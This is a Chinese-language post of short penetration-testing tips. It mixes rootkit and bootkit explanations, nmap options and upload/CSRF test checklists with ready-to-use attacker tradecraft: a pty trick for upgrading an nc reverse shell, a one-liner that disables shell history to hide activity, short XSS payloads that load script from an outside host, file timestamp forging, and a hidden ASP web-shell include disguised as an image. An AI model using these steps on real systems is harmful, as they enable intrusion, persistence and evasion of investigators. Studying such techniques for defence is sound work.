滲透測試筆記七
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。
1.提權后進入遠程桌面發現 desktop locker(桌面鎖)
解決方法:
ctrl+shift+esc 一直按會出現資源管理器,鼠標結束desktop locker即可
2.3389低權限用戶提權(這個情況似乎比較少見?)的時候或者日常滲透用軟件的時候可以
subst x: D:\XXX 用命令創建 X盤符 遠程桌面連接器-本地資源-詳細信息 -驅動器-勾選新增的X盤符
可以把本地驅動器映射到遠程3389服務器上的X盤,放上常用提權工具方便滲透。
3.Rootkits:
Rootkits是linux/unix獲取root權限之后使得攻擊者可以隱藏自己的蹤跡和保留root訪問權限的神器,通常攻擊者使用 rootkit的檢查系統查看是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日志中的有關信息,通過rootkit的嗅探器還可以獲得其他系統的用戶和密碼!
目前常用的有:t0rn /mafix/enyelkm 等等。
Rootkits通常分為:應用級別—內核級別—-硬件級別,早期的是rootkit主要為應用級rootkit通過替換login、ps、ls、 netstat等系統工具或修改.rhosts等系統配置文件等實現隱藏后門,硬件級RootKits主要是指Bios Rootkits,能夠在系統加載前獲得控制權,通過向磁盤中寫入文件,再由引導程序加載該文件重新獲得控制權也可以采用虛擬機技術,使整個操作系統運行在rootkit掌握之中,目前常見的rootkit是內核級rootkit,通過直接修改內核來添加隱藏代碼實現控制系統的功能。
最為簡單實用的應用級別Rootkit是通過將添加過提權代碼的命令替換系統中原始的命令來實現功能的,并且一般提供清理工具刪除wtmp、 utmp、lastlog等日志文件中自己的行蹤,并且復雜點的rootkit還可以向攻擊者提供telnel、shell和finger等服務。
4.LKM隱藏技術:
LKM就是可裝載內核模塊(Loadable Kernel Modules)。這些模塊本來是Linux系統用于擴展其功能的。
木馬最大的特性就是隱蔽性,不能輕易讓人察覺,所以隱藏木馬相關信息是關鍵的因素。對于Linux操作系統來說,主要有靜態隱藏和動態隱藏兩個標準。
由于Linux本身的安全性,想利用外殼程序隱藏木馬文件和進程不可能實現,所以就借要通過修改Linux內核的系統調用來隱藏木馬相關信息,這就是LKM技術。
5.Bootkit:Bootkit是更高級的Rootkit,該概念最早于2005年被eEye Digital公司在他們的“BootRoot”項目中提及。它主要利用其內核準入和開機過程的隱身技術,當在功能上并無異于Rootkit。他們的不同主要表現在獲取準入的方式上。傳統的rootkit利用系統啟動時提升權限。而Bootkit是被安置在外設的主引導扇區和駐留在整個系統的啟動過程。
Bootkit的引導扇區代碼總是在ROM BIOS執行后主引導記錄被載入前劫持系統啟動程序。一旦被載入到內存,代碼便執行中斷指令,也就是俗稱的HOOK掛鉤。它掛接到INT 13指示后續扇區讀取其信息。這個過程完成后,Bootkit試圖改變引導過程的結構和操作邏輯流程。
6.用nst的反彈后門連上nc后不能su交互,報錯如下:
standard in must be a tty
解決方法:
python -c ’import pty; pty.spawn(“/bin/sh”)’
得到shell就可以su進行交互了。
7.history不記錄:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
8、自己嘗試最短的引入外部腳本的xss payload(28個字符):
<script src=http://e1v.cn/pj
9、有文章稱
<script src=//xxx.xxx/a.js></script>
也可以插入,但是實測證明,不是每個瀏覽器都支持沒有http:的插入。要有效可靠的插入,還是參考上一條的插入方法。
10、實在要短得不行的,那就分開來插吧:
<script>var a=’alert’</script>
<script>var b=’(“xss”)’</script>
<script>var c=a+b </script>
<script> eval(c) </script>
11、C類IP地址:C類數字相同的IP地址,通常是同一臺服務器或是處于同一網絡上的服務器。所以如果兩個網站IP地址前三個數字相同,如198.197.196.195和198.197.196.194,搜索引擎會認為這兩個網站之間是有一定關系的,很可能在同一架服務器上。
12、URL靜態化:通過URL重寫技術,將動態URL轉化為靜態URL。在LAMP主機上,URL重寫通常是通過mod_rewrite模塊;在windows主機上,通常是通過ISAPI Rewrite或是 IIS Rewrite模塊。
13、在nmap目錄下有很多掃描腳本,可以實現很多智能化的功能,具體在/nmap/scripts這個目錄下:使用方法:
nmap -P0 --script= smb-check-vulns 192.168.XXX.XX
14、常用的nmap掃描類型參數主要有:
-sT TCP connect掃描
-sS TCP SYN掃描
-sF -sX -sN 通過設置一些特殊的標記位來避開防火墻的檢測
-sP 利用ping來探測主機是否存活
-sU 探測主機開放了哪些UDP端口
-sA TCP ACK掃描
-sV 探測端口上面運行的詳細信息
15、常用的nmap掃描選項有:
-O 探測主機操作系統
-A 比較高級的主機旗標探測
-Pn 不利用ping命令來探測主機是否存活
-F 快速掃描模式
-p<端口范圍>
16、使用icyfox-time.exe修改文件的時間屬性:
icyfox-time.exe "e:\web\yuan.asp" e:\web\gai.asp
注意:第一個文件路徑需要用雙引號,第二個不需要。這樣就把”e:\web\gai.asp”這個文件的時間改為和”e:\web\yuan.asp”文件一樣啦。
17、更加隱蔽的asp網站留后門的方法:
上傳一只一句話圖片馬,具體制作方法請參見“圖種技術”;然后在你要插入一句話的頁面里插入一下代碼語句:
<!--#include file="圖片馬路徑"-->
18、關于上傳漏洞的檢測步驟:
(1).上傳文件是否有格式限制,是否可以上傳exe文件;
(2).上傳文件是否有大小限制,上傳太大的文件是否導致異常錯誤,上傳0K的文件是否會導致異常錯誤,上傳并不存在的文件是否會導致異常錯誤;
(3).通過修改擴展名的方式是否可以繞過格式限制,是否可以通過壓包方式繞過格式限制;
(4).是否有上傳空間的限制,是否可以超過空間所限制的大小,如將超過空間的大文件拆分上傳是否會出現異常錯誤。
(5).上傳文件大小大于本地剩余空間大小,是否會出現異常錯誤。
(6).關于上傳是否成功的判斷。上傳過程中,中斷。程序是否判斷上傳是否成功。
(7).對于文件名中帶有中文字符,特殊字符等的文件上傳。
19、跨站請求偽造(CSRF)
(1).同個瀏覽器打開兩個頁面,一個頁面權限失效后,另一個頁面是否可操作成功。
(2).當頁面沒有驗證碼時,查看頁面源代碼,查是是否有token。如果頁面完全是展示頁面,是不會有token的。